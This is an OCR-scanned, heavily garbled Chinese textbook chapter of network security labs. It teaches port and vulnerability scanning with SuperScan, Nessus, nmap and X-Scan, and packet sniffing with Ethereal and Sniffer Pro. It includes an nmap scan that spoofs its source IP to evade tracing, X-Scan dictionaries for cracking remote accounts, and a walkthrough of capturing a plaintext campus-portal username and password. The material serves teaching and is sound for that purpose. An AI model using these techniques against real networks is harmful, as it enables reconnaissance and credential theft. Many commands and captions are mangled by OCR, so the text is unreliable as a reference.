使 用 多 种 工具 进行 端口 扫描 与 嗅 探 分 析 。 
实验 环境 


硬件 环境 : 安装 Windows 2000 Server\Linux(Red Hat) 操 作 系统 的 计算 机 。 
软件 环境 : SuperScan\Nessus\ X-Scan\nmap 等 工具 软件 。 


预备 知识 
学 习 计 算 机 网 络 有 关 知 识 , 熟 悉 X-Scan 等 多 种 分 析 工具 的 用 法 。 
实验 步 又 


1. 使 用 SuperScan 进行 端口 扫描 

SuperScan 具有 端口 扫描 、 主 机 名 解析 ,Ping 扫描 的 功能 ,其 操作 界面 如 图 3. 3. 13 
所 示 。 
1) 主机 名 解析 功能 
在 Hostname Lookup 栏 中 ,可 以 输入 IP 地 址 或 者 需要 转换 的 域名 , 单 击 Lookup 按钮 
就 可 以 获得 转换 后 的 结果 ; 单 击 Me 按钮 可 以 获得 本 地 计算 机 的 IP 地 址 ; 单 击 Interfaces 按 
钮 可 以 获得 本 地 计算 机 IP 的 详细 设置 。 

2) 端口 扫描 功能 

利用 端口 扫描 功能 ,可 以 扫描 目标 主机 开放 的 端口 和 服务 。 在 IP 栏 中 ,在 Start 栏 中 输 
入 开始 的 IP, 在 Stop 栏 中 输入 结束 的 IP. E Scan type 栏 中 选中 “All list ports from 1 to 
65535”, 这 里 规定 了 扫描 的 端口 范围 ,然后 单 击 Scan 栏 中 的 Start 按钮 ,就 可 以 在 选择 的 IP 
地 址 段 内 扫描 不 同 主机 开放 的 端口 了 。 扫 描 完 成 后 ,选中 扫描 到 的 主机 IP, 单 击 Expand all 
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图 3313 SparScan 操 作 界 面 


按钮 会 展开 每 台 主机 的 详细 扫描 结果 。 例 如 ,从 图 3. 3. 14 中 可 以 看 到 ,对 于 主机 192. 168. 1.2 
共 开 放 了 6 个 端口 。 扫 描 窗 口 右 侧 的 Active hosts 和 Open ports 分 别 显示 了 发 现 的 活动 主 


机 和 开放 的 端口 数量 。 


二 SuperScan 3.00 


Hostname Lookup 


Configuration 


fis2.1681.2 
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IV. Ignore IP zero. 
IV. Ignore IP 255 


T Extract from fle | 


SuperScan 也 提供 了 特定 端口 扫描 的 功能 ,在 Scan type 栏 中 选中 A 


图 3314 端口 扫描 结果 
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list ,就 可 以 按照 选 定 的 端口 扫描 。 单 击 Configuration 栏 中 的 Port list setup 按钮 即 可 进入 
端口 配置 菜单 ,如 图 3.3. 15 所 示 。 选 中 Select ports 栏 中 的 某 一 个 端口 ,左上 角 的 Change/ 


add/delete port info 栏 中 会 出 现 这 个 端口 的 信息 ,选中 Selected 复 选 框 
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单 击 Apply f£ 


钮 就 可 以 将 此 端口 添加 到 扫描 的 端口 列表 中 。 单 击 Add 和 Delete 按钮 可 以 添加 、 删 除 相应 
的 端口 。 然 后 单 击 Port list file 栏 中 的 Save 按钮 ,会 将 选 定 的 端口 列表 存 为 一 个 . 1st 文件 。 
缺 省 情况 下 ,SuperScan 有 scanner. Ist 文件 ,包含 了 常用 的 端口 列表 ,还 有 一 个 trojans. Ist 
文件 ,包含 了 常见 的 木马 端口 列表 。 通 过 端口 配置 功能 ,SuperScan 提供 了 对 特定 端口 的 扫 
描 , 节 省 了 时 间 和 资源 ,通过 对 木马 端口 的 扫描 ,可 以 检测 目标 计算 机 是 否 被 种 植木 马 。 
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3315 端口 配置 界面 


3) Ping 功能 

SuperScan 软件 的 Ping 功能 提供 了 检测 在 线 主 机 和 判断 网 络 状况 的 作用 。 通 过 在 IP 
栏 中 输入 起 始 和 结束 的 TP 地 址 ,然后 选中 Scan type 栏 中 的 Ping only 即 可 单 击 Start 按钮 
启动 Ping 扫描 。 在 IP 栏 ,Ignore IP zero fll Ignore IP 255 分 别 用 于 屏蔽 所 有 以 0 和 255 结 
尾 的 IP 地 址 ,PrevC 和 NextC 可 直接 转换 到 前 一 个 或 者 后 一 个 C 类 IP 网 段 。“1…254” 则 
用 于 直接 选择 整个 网 段 。 在 Timeout 栏 中 可 根据 需要 选择 不 同 的 响应 时 间 。 

2. 使 用 Nessus 进行 扫描 

Nessus 是 UNIX 操作 系统 中 常用 的 扫描 工具 。 它 基于 GPL 开发 ,可 扩展 性 强 , 当 一 个 
新 的 漏洞 被 公布 后 ,很 快 就 可 以 下 载 其 新 的 插件 ,以 支持 网 络 的 安全 性 检查 。 

1) 安装 Nessus 

在 Linux 下 安装 Nessus, 进 行 扫描 实验 。 安 装 文件 名 是 nessus-installer. sh ,使 用 shell 
执行 它 , 输 入 sh nessus-installer. sh ,然后 系统 就 开始 安装 它 , 在 安装 过 程 中 ,安装 程序 会 提 
示 设 置 安装 路 径 等 信息 ,每 次 设置 好 后 按 回 车 键 就 会 继续 执行 安装 ,最 后 系统 提示 : 

Congratulations ! Nessus is now installed on this host 

. Create a nessusd certificate using /usr/local/sbin/nessus- mkcert 

- Add a nessusd user use /usr/local/sbin/nessus- adduser 

- Start the Nessus daemon (nessusd) use /usr/local/sbin/nessusd - D 

. Start the Nessus client (nessus) use /usr/local/bin/nessus 

- To uninstall Nessus, use /usr/local/sbin/uninstall- nessus 

. Remember to invoke 'nessus- update-plugins' periodically to update your 


list of plugins 

. A step by step demo of Nessus is available at : 

http://www.nessus .org/demo/ 

Press ENIER to quit 

这 就 表明 安装 成 功 。 

2) 配置 Nessus 

Nessus 包含 Server 端 和 Client 端 , 第 一 次 使 用 时 要 先 配置 一 个 账号 ,使 用 命令 nessus- 
adduser 建立 一 个 名 为 zx, 密 码 是 2222 的 账号 (可 随意 设 ) ,这 就 是 Server 的 账号 密码 。 使 
用 nessus-mkcert 程序 设置 CA( 基 本 选择 默认 设置 ) ,然后 使 用 命令 nessusd -D 打开 服务 器 
的 进程 (该 控制 台 放 在 后 台 运 行 )。 

3) 运行 Nessus 

再 打开 一 个 新 的 控制 台 输 入 nessus, 出 现 以 下 界面 : 

这 时 第 一 次 使 用 Nessus, 它 会 提示 你 输入 一 个 密码 ,这 是 Client 的 密码 ,输入 以 后 会 弹 
出 一 个 图 形 化 的 登录 界面 ,如 图 3. 3. 16 所 示 。 
sesss oO 


Nessusd host IE T 


New session setup. 


3 Nessusd Host : | localhost 


Port :|1241 


Encryption : [twofist/ripemd160:3 


o vos — — — —] 


Log in 
Start the scan Load report Quit 


图 3316 Nessusd host 设置 界面 


Nessusd Host: EJ Server 所 在 的 主机 ,在 哪 台 主机 上 运行 nessusd -D 就 填 其 IP 地 址 ， 
由 于 扫描 的 是 本 机 漏洞 .所 以 就 是 localhost, 

Port; 默认 的 1241 就 行 。 

Encryption: 默认 的 即 可 。 

Login: 填 上 运行 nessus -P 时 的 账号 名 。 

然后 单 击 Log in 按钮 ,大 概 几 秒 后 ,就 可 以 看 到 connected 的 字样 了 ,这 就 表明 连接 成 
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功 了 。 当 然 , 第 一 次 登录 , 它 会 问 Server 的 密码 ,只 确认 一 次 即 可 ,下 次 启动 就 不 会 再 询 
ly. 
4) 选择 Plugins 选项 卡 
Plugins 是 设 定 要 检查 的 插件 ,如 图 3. 3. 17 所 示 ,使 用 者 可 以 设置 要 检查 的 系统 漏洞 ， 
需要 注意 的 是 ,如 果 上 一 步 没 有 连接 上 主机 ,Plugins 项 里 就 会 是 空 的 。 
下 Ea 


Plugins 


Plugin selection 
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Misc. 
Finger abuses 
Windows 

Gain a shell remotely 
Backdoors 

CGI abuses 

General 

SNMP 

Remote file access 
Useless services 


MAARA T TITIUS 
Ess] 


Enable all Enable all but dangerous plugins Disable all 


Startthe scan | Load report [ Quit 


图 3317 Rugns 选 项 卡 


5) 选择 Prefs. 选项 卡 

如 图 3. 3. 18 STAN. Prefs. 选项 卡 是 用 于 选择 是 否 对 远程 主机 进行 Ping 测试 ,和 选择 
TCP 扫描 方式 的 , 它 提供 了 TCP 全 连接 (connect)、SYN 扫描 (SYN scan), FIN 扫描 (FIN 
scan) , Xmas 扫描 (Xmas Tree scan)4 种 方法 ,其 中 Xmas 扫描 和 FIN 扫描 类 似 , 属 于 秘密 
扫描 技术 的 变种 。 

6) 选择 Scan options 选项 卡 

如 图 3. 3. 19 所 示 ,设置 扫描 端口 为 1 一 15000, 这 就 包括 了 大 部 分 的 端口 。 这 里 还 调整 
了 最 大 线程 数 ,将 其 设置 为 8, 如 果 设 置 得 太 大 ,有 时 会 造成 死机 现象 。 端 口 扫描 方式 可 根 
据 需 要 进行 选择 ,这 里 选择 Nmap tcp connect() scan 方式 。 需 要 解释 的 是 , Nmap 是 一 种 
功能 强大 的 基于 命令 行 界面 的 扫描 工具 ,nessus 提供 了 通过 调用 Nmap 工具 进行 扫描 的 
功能 。 

大 部 分 端口 扫描 方式 在 原理 部 分 进行 了 介绍 ,此 外 还 有 一 种 FTP bounce scan 方式 , 即 
FTP 返回 扫描 方式 ,在 这 种 方式 中 ,入 侵 者 利用 FTP 的 代理 FTP 连接 功能 连接 到 一 个 代理 
FTP 服务 器 进行 端口 扫描 。 它 的 隐蔽 性 强 , 但 速度 很 慢 。 
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Plugins preferences 7 


Ping the remote host: 


Do a TCP ping 


Do an ICMP ping | 


TCP ping source port: [80 | 


TCP ping destination port: [80 


Number ofretries: — [10 | 


Nmap: 
TCP scanning technique : 
@ connect0 
O SYN scan | 
OFIN scan 
| 

O Xmas Tree scan 

EE 
Startthe scan | Load repot | [ uit 


图 3318 Piefs 选 项 卡 


Scan options 
Scan options 
Port range - 1-15000 | 
vesmes: (Bd 
Path to the CGis - /cg-bin | 


C Do a reverse lookup on the IP before testing it 


[Z] Optimize the test 


Port scanner : 


TCP Ping the remote host 
Ping the remote host 
Nmap 

Nmap tcp connect scan 
FTP bounce scan 

TCP SYN scan 


rincon 


[ stanmescan  ][ toadrepot ][ on — 1] 
ÀJ 


图 3319 Som qpians 选 项 卡 


7) 选择 Target selection 选项 卡 
如 图 3. 3. 20 所 示 ,在 这 里 填 人 要 扫描 主机 的 IP 地 址 就 可 以 了 。User 选项 卡 和 Credits 
选项 卡 一 般 不 用 设置 ,选择 默认 设置 即 可 。 
* 102 。 


[Ns HE 
Nessusd host Plugins [Prefs [Scan options | Target selection [User | credits 
[Target selection — as 


Tae: [Rei] 


[Perform a DNS zone transfer 


Startthe scan — |[ Loadrepot — ] Quit 


L 


图 3320 Tage seedim 选 项 卡 


8) 开始 扫描 
单 击 Start the scan, Nessus 就 开始 扫描 目标 主机 了 ,如 图 3. 3. 21 所 示 。 


3 Portscan [LL stop] 
Attack : 
202.112.254.54 Security check mstream handler Detect 
图 3321 扫描 过 程 
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9) 扫描 结果 
扫描 结束 后 ,弹出 扫描 结果 窗口 ,如 图 3. 3. 22 所 示 。 在 Prot 的 扫描 结果 窗口 中 ,不 同 
风险 级 别 的 端口 及 协议 被 清晰 地 标示 出 来 。 


[v. Nessus "NG" Report — 50g 


R- | ? tp (123/udp) | ak Security Warring | 
9 netbios-ssn (139/tcp) 9 Security Note 
9  netbios-ns (137/udp) 

msrpc (135/tcp) 
@  microsoft-ds (445/tcp) 
? 


neral/udp. 


Q general/icmp 


= 
The remote host does not discard TCP SYN packets which 
have the FIN flag set. 


Depending on the kind of firewall you are using, an 
attacker may use this flaw to bypass its rules. 


A See also: http.//archives.neohapsis.com/archives/bugtraa/2Q 
http.//www.kb.cert.org/vuls/id/464113 


Solution : Contact your vendor for a patch 
Risk factor : Medium B 


Bede 
i —— [| 
Save report... ] Close window 


E] 3322 tert 项 具体 扫描 结果 


其 中 ,Security Note 是 安全 注释 ,Security Warning 是 安全 警告 ,Security Holes 是 安全 
漏洞 ,再 展开 其 中 的 一 项 ,如 Security Holes, 可 以 看 到 关于 漏洞 的 具体 说 明和 解释 。 还 可 以 
单 击 下 面 的 按钮 ,把 这 次 扫描 结果 保存 为 某 种 格式 ,保存 为 NSR 格式 后 ,可 以 用 命令 
nussesd -r * .nsr 打开 某 个 扫描 结果 ,保存 为 http 格式 后 ,直接 用 浏览 器 浏览 即 可 。 

3. 使 用 nmap 进行 扫描 

nmap 是 Linux 下 的 网 络 扫描 和 嗅 探 工 具 包 。 可 以 帮助 网 管 人 员 深 入 探测 UDP 或 者 
TCP 端口 ,直至 主机 使 用 的 操作 系统 ;还 可 以 将 所 有 探测 结果 记录 到 各 种 格式 的 日 志 中 ,为 
系统 安全 服务 。 其 基本 功能 有 3 个 : 一 是 探测 一 组 主机 是 否 在 线 ; 其 次 是 扫描 主机 端口 , 嗅 
探 提 供 的 网 络 服务 :还 可 以 推断 主机 所 用 的 操作 系统 。nmap 可 用 于 扫描 仅 有 两 个 节点 的 
LAN ,直至 500 个 节点 以 上 的 网 络 。nmap 还 允许 用 户 定制 扫描 技巧 。 通 常 , 一 个 简单 地 使 
用 ICMP 的 ping 操作 可 以 满足 一 般 需求 ;也 可 以 深入 探测 UDP 或 者 TCP 端口 ,直至 主机 
使 用 的 操作 系统 ;还 可 以 将 所 有 探测 结果 记录 到 各 种 格式 的 日 志 中 , 供 进一步 分 析 操 作 。 

(1) 检查 nmap 是 否 已 安装 ,如 图 3. 3. 23 所 示 。 


pm - q nmap 
(2) 也 可 以 使 用 whereis 命令 (whereis nmap) 8k 3$ find 命令 (find /-name nmap) 验 证 
nmap 是 否 已 安装 及 其 位 置 ,如 图 3. 3. 24 所 示 。 
(3) 如 果 没 有 以 上 返回 信息 ,就 说 明 nmap 尚未 安装 ,获得 nmap 安装 包 后 ,使 用 以 下 命 
令 进 行 安装 。 
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froot@redhat73:~ 


A333 检查 nrmep 安 装 情况 


元 root@redhat7: 


图 3324 检查 rmep 的 安装 位 置 
rpgn-irmap-2 3BETAL4- 1 i386.rpm 
(4) 执行 命令 /usr/bin/nmap -h, 以 获得 帮助 信息 ,如 图 3. 3. 25 所 示 。 


f root@redhat?: 


A335 获取 rmep 帮 助 信息 


G) 进行 连通 性 检测 : nmap -sP 192. 168.0. * (192. 168.0 为 当前 网 段 ) ,如 图 3. 3. 26 
所 示 。 
(6) 进行 端口 扫描 ,注意 观察 开放 的 端口 号 : nmap -sS 192. 168. 0. x (x 为 合作 伙伴 座 
i 159) ,如 图 3. 3. 27 所 示 。 
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;£ rootaredhat 


图 3326 rmep 连 通 性 检测 


if root@redhat73:~ 


图 3327 ”rmep 端 口 扫描 


(7) 使 用 nmap 的 TCP/IP 探测 功能 查询 合作 伙伴 的 系统 信息 : nmap -O 192. 168. 0. x 
(x 为 合作 伙伴 座位 号 159) ,如 图 3. 3. 28 所 示 


f root@redhat 


3328 nrmep 查 询 伙伴 系统 信息 
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(8) 注意 返回 的 信息 , 接 下 来 使 用 同样 的 方法 查询 教师 机 的 系统 信息 。 


在 返回 信息 中 


应 该 看 到 教师 机 的 开放 端口 和 操作 系统 信息 ,这 些 数据 一 旦 被 攻击 者 获得 ,就 有 可 能 导致 其 


被 攻击 和 破坏 。 


(9) 使 用 参数 U 检测 NT 下 的 UDP 端口 : nmap -sU 192. 168. 0. x(x 为 合作 伙伴 座位 


号 159), 如 F 


Bd 3329 rmep 检 测 NT 下 的 UDP 端口 


(10) 输入 以 下 命令 ,检测 端口 信息 ,同时 伪造 源 IP 地 址 ,这 样 做 不 仅 获 得 了 端口 信息 ， 


同时 还 使 得 检测 方 不 被 轻易 发 现 、 跟 踪 , 如 图 3. 3. 30 所 示 
mep - sS 192.168.0.159 - S 192.168.0.34 - e eth0 - PO 


$ root@redhatT3:~ 


图 3330 rmep 伪 造 PP 检测 端口 


4. 使 用 X-Scan 进行 漏洞 检测 


X-Scan 是 由 安全 焦点 开发 的 一 个 功能 强大 的 扫描 工具 。 采 用 多 线程 方式 对 指定 TP 地 
址 段 (或 单机 ) 进 行 安全 漏洞 检测 ,支持 插件 功能 ,提供 了 图 形 界面 和 命令 行 两 种 操作 方式 。 
扫描 内 容 包 括 : 远程 服务 类 型 .操作 系统 类 型 及 版 本 ,各 种 弱 口 令 漏 洞 . 后 门 、 应 用 服务 漏 


洞 、 网 络 设备 漏洞 .拒绝 服务 漏洞 等 20 多 个 大 类 。 
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(1) 运行 主 程序 。 
运行 主 程序 ,面板 上 方 的 功能 按钮 包括 :“ 扫 描 模 块 ”“* 开 始 扫 描 ”"“ 和 暂停 扫描 ”终止 扫 
描 ”*” 检 测报 告 ”* 使 用 说 明 ”“ 在 线 升级 “退出 ”, 如 图 3. 3. 31 所 示 。 


系统 要 求 : Windows NT/2000/XP/2003 
理论 上 可 运行 于 Windows 机 系列 拘 作 系统 ， 推 荐 运行 于 Windows 2000 以 上 的 Server 版 indows 系 统 。 


功能 简介 


(2) 扫描 参数 设置 。 

从 “扫描 参数 ”开始 ,打开 设置 菜单 ,在 “检测 范围 "中 的 “指定 TP 范围 ?输入 要 检测 的 目 
标 主 机 的 域名 或 他, 也 可 以 对 多 个 IP 进行 检测 。 例 如 ,输入 192. 168. 0. 1— 192. 168. 0. 255, 
对 这 个 网 段 的 主机 进行 检测 ,如 图 3. 3. 32 所 示 。 


92. 168.0. 1-192. 168. 0. 255 | 


图 3332 XScan 检 测 范围 
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在 全 局 设置 中 可 以 选择 最 大 并 发 线程 数量 和 最 大 并 发 主机 数量 。 在 “其 他 设置 "里 还 可 
以 选择 * 跳 过 没有 响应 的 主机 ”和 ”无 条 件 扫描 ”。 如 果 选 择 * 跳 过 没有 响应 的 主机 ”, 对 方 禁 
JET PING 或 防火 墙 设置 ,使 对 方 没有 响应 ,X-Scan 会 自动 跳 过 ,自动 检测 下 一 台 主 机 。 如 
果 选 择 * 无 条 件 扫描 ”,X-Scan 会 对 目标 进行 详细 检测 ,这 样 结果 会 比较 详细 ,也 会 更 加 准 
确 , 但 扫描 时 间 会 延长 。 

通常 对 单一 目标 使 用 这 个 选项 ,如 图 3. 3. 33 所 示 。 


图 3333 XScan 设 置 并 发 扫描 


在 “端口 相关 设置 "中 可 以 自 定义 一 些 需 要 检测 的 端口 。 检 测 方式 有 TCP 和 SYN 两 
种 ,TCP 方式 容易 被 对 方 发 现 , 准 确 性 要 高 一 些 ,SYN 方式 则 相反 ,如 图 3. 3. 34 所 示 。 


图 333 XScan 端 口 相关 设置 
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"SNMP 相关 设置 "主要 是 针对 SNMP 信息 的 一 些 检测 设置 。 

"NETBIOS 相关 设置 "是 针对 Windows 系统 的 NETBIOS 信息 的 检测 设置 ,包括 的 项 
目 有 很 多 种 ,根据 需求 选择 实用 的 就 可 以 了 。 

“漏洞 检测 脚本 设置 "主要 是 选择 漏洞 扫描 时 所 用 的 脚本 ,如 图 3. 3. 35 所 示 。 


图 3335 XScan 的 加 载 脚本 


如 果 需 要 同时 检测 很 多 主机 ,可 以 根据 实际 情况 选择 特定 的 脚本 。X-Scan 脚本 设置 如 
图 3. 3. 36 所 示 。 


图 3336 XScan 脚 本 设置 


“CGI 相关 设置 “网 络 配置 ?和 以 前 的 版 本 区 别 不 大 ,使 用 默认 的 选项 就 可 以 。 
“字典 文件 设置 ?是 X-Scan 自 带 的 一 些 用 于 破解 远程 账号 所 用 的 字典 文件 ,这 些 字典 都 
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是 简单 或 系统 默认 的 账号 等 。 可 以 选择 自己 的 字典 或 手工 对 默认 字典 进行 修改 。 默 认 字典 
存放 在 DAT 文件 夹 中 。 字 典 文 件 越 大 ,探测 时 间 越 长 。 字 典 设置 如 图 3. 3. 37 所 示 。 


A337 字典 设置 
(3) 扫描 模块 设置 。 


“扫描 模块 ?用 于 检测 对 方 主机 的 一 些 服务 和 端口 等 情况 。 可 以 选择 检测 全 部 服务 或 只 
检测 部 分 服务 。 扫 描 模块 设置 如 图 3.3.38 所 示 。 


TARER 


A338 扫描 模块 设置 


(4) 开始 扫描 。 


设置 好 以 上 两 个 模块 以 后 , 单 击 “ 开 始 扫 描 " 就 可 以 了 。X-Scan 会 对 对 方 主机 进行 详细 


的 检测 ,如 图 3.3.39 所 示 。 如 果 扫 描 过 程 中 出 现 错误 ,会 在 “错误 信息 ”中 看 到 。 
(5) 结束 扫描 。 


在 扫描 过 程 中 如 果 检 测 到 漏洞 ,可 以 在 “漏洞 信息 ”中 查看 。 扫 描 结束 后 ,会 自动 弹出 检 
测报 告 , 包 括 漏洞 的 风险 级 别 和 详细 的 信息 ,以便 可 以 对 对 方 主机 进行 详细 分 析 。 

实验 报告 要 求 

。 写 明 实 验 目的 。 

。， 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 


= IH- 


图 3339 开始 扫描 


。 By KS 

3.3.6 局 域 网 信息 嗅 探 实验 
实验 器 材 

微型 计算 机 ,一 台 。 

预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 嗅 探 软 件 的 使 用 与 原理 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 
熟悉 嗅 探 软 件 的 使 用 与 原理 。 使 用 Ethereal 检测 网 络 环境 , 抓 包 , 嗅 探 ,并 分 析 扫 描 结 


果 。 通 过 实验 掌握 Sniffer Pro 工具 的 安装 及 使 用 ,理解 TCP/IP 中 TCP、IP、ICMP 数据 包 
的 结构 .了解 网 络 中 各 种 协议 的 运行 状况 。 


实验 环境 


硬件 环境 : 安装 Windows 7 操作 系统 或 Linux 操作 系统 的 计算 机 ,局域网 环境 。 
软件 环境 : Ethereal for Linux or Windows\Sniffer Pro 4. 7. 530, 
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实验 步骤 

1. 使 用 Ethereal 进行 抓 包 并 分 析 数 据 包 格式 

Ethereal 是 Linux 下 的 一 自 带 工具 , 若 想 安装 到 Windows 平台 下 , 须 安装 相应 的 补丁 。 

安装 : 找到 支持 Windows 的 版 本 和 补丁 安装 到 Windows 平台 下 ,安装 过 程 与 安装 普 
通 的 程序 相同 。 

单 击 开 始 一 程序 一 Ethereal-~Ethereal 运行 程序 ,如 图 3. 3. 40 所 示 。Ethereal 的 主 界 
面 如 图 3. 3. 41 所 示 。 


M. 


a 
a 
a 
IE] 
回 
Im] 
& 


[可 ROT 


Reset| Apply] Ready to load or capture 


图 3341 Bhre 的 主 界面 


COD 抓 包 实例 。 

选择 Capture Start 命令 ,出现 “ 抓 包 选 项 ”对 话 框 ,如 图 3. 3. 42 所 示 。 
Interface: 选择 接口 ( 指 哪 块 网 卡 )。 

Limit each packet to: 是 否 限 制 包 大 小 。 

Capture packets in promiscuous mode: 是 否 让 网 卡 工作 在 混杂 模式 上 。 
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Filter; 包 过 滤 ( 过 滤 哪 些 包 ) 。 Imm ada 

基本 抓 包 设置 已 具备 ,如 果 需 要 其 他 功能 ,可 以 nere 
设置 下 面 的 选项 。 o D -A 

Capture file: 捕获 文件 。 ee eee ee 

Display options; 扩展 选项 。 

Capture limits: 捕获 限定 。 

Name resolution: 名 称 辨别 。 

(2) 数据 包 分 析 。 

先 打开 嗅 探 器 ,然后 开始 抓 包 。 如 以 上 步骤 , 单 
击 OK 按钮 ,此 时 车 有 人 使 用 ping 命令 , 则 会 被 抓 。 

3. 3. 43 中 的 椭圆 部 分 是 被 截获 的 ping 包 ( 四 
去 四 回 )。 分 析 ping 包 , 选 中 其 中 一 个 ping 包 , 此 时 
会 在 第 二 个 列表 显示 该 包 的 相关 信息 ,如 图 3. 3. 44 
所 示 。 

从 第 二 部 分 中 可 以 知道 以 下 信息 。 

* 结构 : 包括 数据 包 收 到 时 间 、 数 据 包 传输 时 

间 .结构 数 等 。 A332 MEAR” Wie 


。 网 络 类 型 : (本 例 中 为 以 太 开 型 ) 包 括 来 源 、 目 的 ,类 型 (ip) 等 。 


es on 
BEthernet II, src: 02:01 
Data (1496 bytes) 


Internet 协议 : 其 中 有 协议 类 型 (icmp) 、 来 源 地 址 、 目 标 地 址 等 。 
Internet 控制 消息 请 求 协 议 : ping 的 192. 168. 1. 101 请 求 及 192. 168. 1. 123 回应 。 
具体 数据 内 容 在 最 后 的 方 框 中 显示 (二 进 制 码 ) 。 

eMe 


Ethereal 


File Edit Capture Display Tools 


192.168.1.90 123.87.147.55 
192.168.1.90 123.87.147.55 
192.168.1.90 123.87.147.55 
192.168.1.90 123.87.147.55 
192.168.1.90 123.87.147.55 
192.168.1.90 123.87.147.55 
192.168.1.90 123.87.147.55 
192.168.1.90 123.87.147.55 
27 1.006316 192.168.1.90 123.87.147.55 
28 1.006428 192.168.1.90 123.87.147.55 
29 1.006526  192.168.1.90 123.87.147.55 
30 1.021470 192.168.1.90 123.87.147.55 
31 1.021582 192.168.1.90 123. 87.147,55 


Frame 1 (1510 bytes on wire, 1510 bytes captured) 
田 Erherner II, src: 02:01:00:00:00:00, ost: ff:ff:ff:ff:ff:ff 
Data (1496 bytes) 


3388382288] 


Reset] Apply|| File: <capture> Drops: 0 


图 3344 解码 ping 


(3) 账户 和 密码 的 截获 。 
打开 Ethereal- Capture Start— 3€ f£ iE Ze BE SC . HG OK 按钮 开始 捕获 数据 包 , 单 击 
STOP 按钮 停止 拦截 ,捕获 的 数据 包 信息 如 图 3. 3. 45 所 示 o 
[@ (vatitied) -Ethereal eee 


File Edit View Go Capture Analyze Statistics Help 


Gago a oebx«e*GA QevoF sz 


0. 598205 112.101.76.152 all 


0.647555 192.168.1.90 112.101. 76.152 

34 0.647556 192.168.1.90 112.101.76.152 TCP 

35 0.708245 112.101.76.152 192.168.1.90 TCP 

36 0.708500 192.168.1.90 112.101.76.152 TCP 

37 0.708577 192.168.1.90 112.101.76.152 TCP 

38 0.708578 192.168.1.90 112.101.76.152 TCP 

52 0.921991 112.101.76.152 192.168.1.90 TCP 

53 0.922141 192.168.1.90 112.101.76.152 TCP 

54 0.922143 192.168.1.90 112.101.76.152 TCP 

55 0.922215 192.168.1.90 112.101.76.152 TCP 

76.152 192.161 90 TCP 

1.90 112.101.76. TCP 

90 112.101.76.152 TCP 

90 112.101.76.152 TCP 

.152 192.168.1.90 TCP 

90 112.101.76.152 TCP 

.1.90 112.101.76.152 TCP 

77 1.216987  112.101.76.152 192.168.1.90 TCP 

78 1.217254  192.168.1.90 112.101.76.152 TCP 

79 1.217286  192.168.1.90 112.101.76.152 TCP 
90 


80 1.217331 192.168.1. 112.101.76.152 TCP 


4 d ec 4 


DE Para 
图 3346 捕获 的 数据 包 信息 


如 果 在 Ethereal 打开 时 有 人 正 登 录 主页 ,或 传输 明文 代码 ,该 包 将 会 被 拦截 。 校 园 信 
息 门 户 如 图 3. 3. 46 所 示 。 


d EA 
“i 4 vi 2112 Fane 


Harbin Engineering University 


O 用 户 登录 


用 户 名 1123456 
[E e] 


rium wmen Msg 


yc 


录 时 ， 系 统 会 进行 初 蛤 化 ， 反 应 时 间 精 长 TOS 


图 3346 校园 信息 门户 


选中 一 个 数据 包 (TCP) 右 击 ,从 弹出 的 快捷 菜单 中 选择 Follow TCP Stream, 如 图 3. 3. 47 
所 示 。 
PISTES 


Edit View Go Capture Analyze Statistics Help 


Sa gie a ochbx«eea VevrvoFZ 


190 2.650902 202.118.177.80 
192 2.660462 202.118.177.80 
193 2.660466 202.118.177.80 


4 


1 0a 54 c ea 4 
010 03 25 40 9f 40 00 40 06 00 00 cO a8 01 65 ca 76 
020 bl 50 c9 eO 00 50 8e ae e6 66 b9 Se 43 fb 50 18 
030 40 29 40 ec 00 00 50 4f 53 54 20 2f 77 65 62 2f 


4 


fT A A Se ee aa | 
[File:"C:’\Users\ADMINI~1\AppDatalLocaliTemplet.. [P- 402D: 11 M: 0 Drops:0 | 
图 334 解码 TCP 包 
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显示 TCP 包 信息 ,如 图 3. 3. 48 所 示 。 


Follow TCP stream 


jser-Agent: Mozilla/S.0 (compatible; MSIE 9.0; windows NT 6.1; Trident/5.0; 
Browser /7. 6. 22690. 400 
R : net portale beu. edu. cn/indexNone/index. none. jsp?error=1 
zh-CN 


ookie: JSESSIONID-B4CACE1E3172C9972814067C27F693F6.tomcat2; GUEST LANGUAGH 
'OOKIE. SUPPORT-true 


May 2014 06:41:33 GMT 
x) mod jk/1.2.28 
Heep fronz beu. edu. cn/indexNone/index. none. jsp?error=1 


eep-Alive: timeout=5, max=100 
connection: Keep-Alive 
ontent-Type: text/html; charset-UTF-8 


/indexnone/index_none. jsp?error=1 HTTP/1.1 
cept: text/html, application/xhtmlexml, */* 


er-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Trident/5.0; 
QBrowser /7. 6. 22690. 400. 


图 334 获取 用 户 名 和 密 

从 该 数据 流 中 可 以 看 到 用 户 的 名 称 、 密 码 、 时 间 等 相关 信息 Curl 上 方 为 用 户 信 息 ,url 下 
方 为 网 站 反馈 信息 )。 

loging 58 login= 123456& 58 password- 12345 

注意 事项 : Ethereal 开启 的 时 间 不 能 太 长 ,如 果 拦 截 的 数据 包 过 多 ,超过 Ethereal 的 承 
受 能 力 ,Ethereal 将 会 死 掉 。 

提示 : 如 果 要 在 网 络 上 传输 数据 ,一 定 要 注意 保密 性 ! 

2. 用 Sniffer Pro 抓 取 数 据 包 并 实例 分 析 


CD 将 Sniffer Pro 安装 在 本 机 Windows 7(192. 168. 0. 245) 上 。 安 装 界面 如 图 3. 3. 49 
所 示 。 


图 334 安装 界面 


-= diy * 


(2) 安装 完成 的 界面 如 图 3. 3. 50 所 示 。 


Setup Complete 


‘Setup has finished copying files to your computer. 
Before you can use the program, you must restart Windows or 
your computer. 


ee oe Sip nen 


C. No, | wil restart my computer later. 


Remove any disks from their drives, and then click Finish to 
complete setup. 


Bak 


图 3350 安装 完成 


(3) 启动 Sniffer Pro 软件 。 
启动 Sniffer Pro 软件 后 ,可 以 看 到 它 的 主 界面 ,如 图 3. 3. 51 所 示 ,启动 时 有 时 需要 选 
择 相 应 的 网 卡 (adapter) , 选 好 后 即 可 启动 软件 。 


Sniffer - Local, Ethernet (Line speed at 100 Mbps) 
菜单 Fde—Monior Capture Display Tools Database Window Help 


»[ in| mfal] X [evi = 
LR S| &gs|z»|e || al@liB) t| S| e 


EE 窗口 


3351 主 界面 


工具 栏 如 图 3. 3. 52 所 示 。 

